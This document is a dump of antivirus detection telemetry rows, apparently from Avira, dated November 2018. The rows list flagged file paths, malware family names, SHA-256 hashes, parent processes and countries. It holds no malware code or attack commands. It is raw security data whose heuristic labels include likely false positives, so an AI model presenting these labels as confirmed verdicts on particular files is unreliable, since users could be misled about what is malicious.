  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe347_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe347 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T03:07:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe319_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe319 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T11:22:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe539_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe539 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T12:22:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe53_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe53 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T17:04:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe98_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe98 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T08:17:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe811_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe811 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T00:58:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:53:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe556_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe556 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T02:06:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='27c83018c2f03aa4d3280aac2fda41f82755a36ac3c04b2d3c86372921781ea9', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T19:28:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='เพลงลูกทุ่ง.exe', filepath='E:\\music\\เพลงลูกทุ่ง\\เพลงลูกทุ่ง.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='27d823625812631bb20f4546254ff0da2ca12bd99aea3b989ef753e1af58afed', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:14:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2815e2decbed0963deb862b58fdc4a3f37d930314d177dcfddc561319dfcb3b9', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\2815E2DECBED0963DEB862B58FDC4A3F37D930314D177DCFDDC561319DFCB3B9', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='2815e2decbed0963deb862b58fdc4a3f37d930314d177dcfddc561319dfcb3b9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:58:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ophcrack.exe', filepath='K:\\HBCD\\Programs\\OPHCrack.exe', filesize=64000, name='TR/Agent.64000.101.#M1.#R1'), hash='28d02d53172d5486e395b7cc2768e91b922defe83fe554f97d652a3879527a70', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='K:\\HBCD\\PStart.exe', parentsize=786952, timestamp='2018-11-01T17:01:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-191230-3c918f87', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190219-D4548F48\\AVSCAN-20181101-191230-3C918F87', filesize=64000, name='TR/Agent.64000.101.#M1.#R1'), hash='28d02d53172d5486e395b7cc2768e91b922defe83fe554f97d652a3879527a70', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:12:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='offcln.exe', filepath='E:\\Backup 03-04-2018\\MS Office 2003\\Microsoft office 2003\\FILES\\PFILES\\MSOFFICE\\OFFICE11\\OFFCLN.EXE', filesize=64000, name='TR/Patched.Gen.#M300.#R3369'), hash='28dc12c63f1c9bc70e7fc0730a8e927a4be8740147f4f40a34eb5e2f3db5fa65', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:+mgVi1otx0uMv3lM.1', country='PK', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T04:30:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='offcln.exe', filepath='\\\\?\\E:\\Backup 03-04-2018\\MS Office 2003\\Microsoft office 2003\\FILES\\PFILES\\MSOFFICE\\OFFICE11\\OFFCLN.EXE', filesize=64000, name='TR/Patched.Gen.#M300.#R3369'), hash='28dc12c63f1c9bc70e7fc0730a8e927a4be8740147f4f40a34eb5e2f3db5fa65', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T04:31:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\config\\1\\1\\2\\3\\1\\1\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.71.#M1.#R1'), hash='298cbe85ed29c3da3c0911f41b694304300d80e5b7bb00626165260169b0ac87', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T02:08:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='\\\\?\\C:\\Windows\\system32\\config\\aol\\2\\1\\1\\2\\2\\1\\1\\1\\1\\1\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.71.#M1.#R1'), hash='298cbe85ed29c3da3c0911f41b694304300d80e5b7bb00626165260169b0ac87', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:07:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2a06ec50ce8b4c2ee05dd4f75399b53b29d2dc9e615390f66f4c44ea61e11bff', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\2A06EC50CE8B4C2EE05DD4F75399B53B29D2DC9E615390F66F4C44EA61E11BFF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2a06ec50ce8b4c2ee05dd4f75399b53b29d2dc9e615390f66f4c44ea61e11bff', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:25:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='optprostart.exe', filepath='C:\\Program Files (x86)\\Optimizer Pro\\OptProStart.exe', filesize=212000, name='PUA/OptimizerPro.Gen.#M300.#R6073'), hash='2a33ac6bc880560eada16c962b64dd9835ad890bda09f8d14095db0882703f16', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:40:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='optprostart.exe', filepath='C:\\Program Files (x86)\\Optimizer Pro\\OptProStart.exe', filesize=212000, name='PUA/OptimizerPro.Gen.#M300.#R6073'), hash='2a33ac6bc880560eada16c962b64dd9835ad890bda09f8d14095db0882703f16', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:00:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='n6muu6ognf.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsj35C.tmp\\n6MUu6OGNF.exe', filesize=2368000, name='HEUR/AGEN.1006920.#M1.#R1'), hash='2a3c3a5f2509b64fb77f23693b3b1a9cf2f369f46b4e81d9929461a21cf727cd', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Blackmagic Design DaVinci Resolve Studio 15.1.2.8 + Crack [CracksMind]\\DaVinci_Resolve_Studio_15.1.2_Windows.exe', parentsize=968373253, timestamp='2018-11-01T21:14:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bkpurchase.exe', filepath='D:\\BKAssets 25-10-2011\\BKPurchase.exe', filesize=1600000, name='TR/Dropper.MSIL.Gen.#M300.#R5091'), hash='2bd3883330f42fee417e6eb8d2456010cd6b14bd7ab07ba494706b2da76e57e4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:53:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2c4b25e02357914cabf6732f1e9844378cdd0ace882ca4226a5758acb9a0a7e8', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_11.10.2018-40.available\\Avira\\2C4B25E02357914CABF6732F1E9844378CDD0ACE882CA4226A5758ACB9A0A7E8', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='2c4b25e02357914cabf6732f1e9844378cdd0ace882ca4226a5758acb9a0a7e8', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T10:49:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msmpeg2vdec.dll', filepath='C:\\Windows\\System32\\msmpeg2vdec.dll', filesize=128000, name='HEUR/AGEN.1031535.#M1.#R1'), hash='2c7c4f879074aa1bb1f815a9eb74e18dd090671360634d2c97cee59d652c148b', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:58:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='taskhost.vir', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\Adobe\\taskhost.VIR', filesize=768000, name='HEUR/AGEN.1000279.#M1.#R1'), hash='2d129e5e4d7ac70661f11b8bbdef83067f74e4f0963a9b1820431231913e7b6e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:29:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2d78fabefd783634910ace900ca49652552918ac0d2d3d8a15e3b98b22cd501f.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-16.available\\Avira\\2D78FABEFD783634910ACE900CA49652552918AC0D2D3D8A15E3B98B22CD501F.VIR', filesize=2560000, name='Worm/Ngrbot.adwm.#M1.#R1'), hash='2d78fabefd783634910ace900ca49652552918ac0d2d3d8a15e3b98b22cd501f', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T08:53:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-185015-f56be8b4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_50ed1053\\AVSCAN-20181101-185005-F3E7200F\\AVSCAN-20181101-185015-F56BE8B4', filesize=512000, name='TR/Drop.Agent.coc.#M1.#R1'), hash='2e396b3e8f08784c63f4097171584d19bb30490f16c6363556ae06a7443a26b8', metadata=Row(cmdline=None, country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:50:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aktove+dnevnici.pif', filepath='F:\\Aktove+Dnevnici\\Aktove+Dnevnici.pif', filesize=512000, name='TR/Drop.Agent.coc.#M1.#R1'), hash='2e396b3e8f08784c63f4097171584d19bb30490f16c6363556ae06a7443a26b8', metadata=Row(cmdline=None, country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T16:49:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-185128-fff295ff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_50ed1053\\AVSCAN-20181101-185117-FE74C7B1\\AVSCAN-20181101-185128-FFF295FF', filesize=512000, name='TR/Drop.Agent.coc.#M1.#R1'), hash='2e396b3e8f08784c63f4097171584d19bb30490f16c6363556ae06a7443a26b8', metadata=Row(cmdline=None, country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:51:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bala4ev.scr', filepath='F:\\Bala4ev\\Bala4ev.scr', filesize=512000, name='TR/Drop.Agent.coc.#M1.#R1'), hash='2e396b3e8f08784c63f4097171584d19bb30490f16c6363556ae06a7443a26b8', metadata=Row(cmdline='\\\\\\"F:\\\\\\\\Bala4ev\\\\\\\\Bala4ev.scr\\\\\\"', country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\notepad.exe', parentsize=179712, timestamp='2018-11-01T16:51:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tripeaks.exe', filepath='C:\\PROGRAM FILES\\GAMEHOUSE GAMES COLLECTION\\ANCIENT TRIPEAKS\\Tripeaks.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='2e7e18c5fdf00ac0b45f3880a122cda23d38d3a23120ad2a967b27863dcdaee8', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Program Files\\\\\\\\HP\\\\\\\\HP Deskjet 1510 series\\\\\\\\bin\\\\\\\\HPStatusBL.dll\\\\\\",RunDLLEntry SERIALNUMBER=CN4C22P0BT05XJ;CONNECTION=USB;MONITOR=1;', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T10:07:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='post benachrichtigungsformular 25.10.2018 514892586.doc', filepath='Post Benachrichtigungsformular 25.10.2018 514892586.doc', filesize=192000, name='W97M/Agent.39570379.#M0.#R0'), hash='2ed2b71c18d4c5af342917fddcad473afe8276e62bc001e6b8660714b132fec7', metadata=Row(cmdline=None, country='CH', os_name='MacOS', os_vmajor='14', os_vminor='5', parentproc=None, parentsize=None, timestamp='2018-11-01T20:42:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-113353-34f6c949', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b33d02c7\\AVSCAN-20181101-112906-89C620F7\\AVSCAN-20181101-113353-34F6C949', filesize=380000, name='PUA/MyWebSearch.Gen.#M1.#R1'), hash='2ef9d244711647f816f2f0600bfeb1247fad7214ccc12e1851e40d42e7d3b3b0', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:33:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='videoconvert-ttab02-a74bec0684c08ff3beb5e8ebd351d67c.exe', filepath='C:\\Users\\X\\Desktop\\source\\MS\\InProd20181026-Tooltab\\VideoConvert-TTAB02-A74BEC0684C08FF3BEB5E8EBD351D67C.exe', filesize=380000, name='PUA/MyWebSearch.Gen.#M300.#R6777'), hash='2ef9d244711647f816f2f0600bfeb1247fad7214ccc12e1851e40d42e7d3b3b0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe9_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe9 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T04:39:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-115910-bd464506', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b33d02c7\\AVSCAN-20181101-112906-89C620F7\\AVSCAN-20181101-115910-BD464506', filesize=380000, name='PUA/MyWebSearch.Gen.#M1.#R1'), hash='2ef9d244711647f816f2f0600bfeb1247fad7214ccc12e1851e40d42e7d3b3b0', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:59:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-114532-d5726b2f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b33d02c7\\AVSCAN-20181101-112906-89C620F7\\AVSCAN-20181101-114532-D5726B2F', filesize=380000, name='PUA/MyWebSearch.Gen.#M1.#R1'), hash='2ef9d244711647f816f2f0600bfeb1247fad7214ccc12e1851e40d42e7d3b3b0', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:45:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='videoconvert.30b82573c10d4fd08477f17390677259[1].exe', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\077Z9PO7\\VideoConvert.30b82573c10d4fd08477f17390677259[1].exe', filesize=380000, name='PUA/MyWebSearch.Gen.#M300.#R6777'), hash='2ef9d244711647f816f2f0600bfeb1247fad7214ccc12e1851e40d42e7d3b3b0', metadata=Row(cmdline='SCODEF:7616 CREDAT:275457 \\\\\\/prefetch:2', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=817456, timestamp='2018-11-01T10:39:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-103446-146cd659', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_27d3c769\\AVSCAN-20181101-103330-0B109C9C\\AVSCAN-20181101-103446-146CD659', filesize=256000, name='TR/Qadars.W.#M1.#R1'), hash='2f1b558a52a9d6e2ac57db7a2e2813a8811f391ae4c45f5eee5a709bf3b43791', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:04:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2f4156f6dc2dd147b7273406deb8d9ad7f466e70f84807ad6f8d50595f3efe43.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-16.available\\Avira\\2F4156F6DC2DD147B7273406DEB8D9AD7F466E70F84807AD6F8D50595F3EFE43.VIR', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='2f4156f6dc2dd147b7273406deb8d9ad7f466e70f84807ad6f8d50595f3efe43', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T08:53:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142733-69883200', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_04471ea5\\AVSCAN-20181101-142703-64C80461\\AVSCAN-20181101-142733-69883200', filesize=1408000, name='X2000M/Laroux.B.#M1.#R1'), hash='2f5f15749752e7dc7ed01e76fca7f94606b19046c89897b234a063fd7b2b21dd', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:29:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142741-6ab45972', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_04471ea5\\AVSCAN-20181101-142703-64C80461\\AVSCAN-20181101-142741-6AB45972', filesize=1408000, name='X2000M/Laroux.B.#M1.#R1'), hash='2f5f15749752e7dc7ed01e76fca7f94606b19046c89897b234a063fd7b2b21dd', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:29:27Z'), dt=datetime.date(2018, 11, 1)),
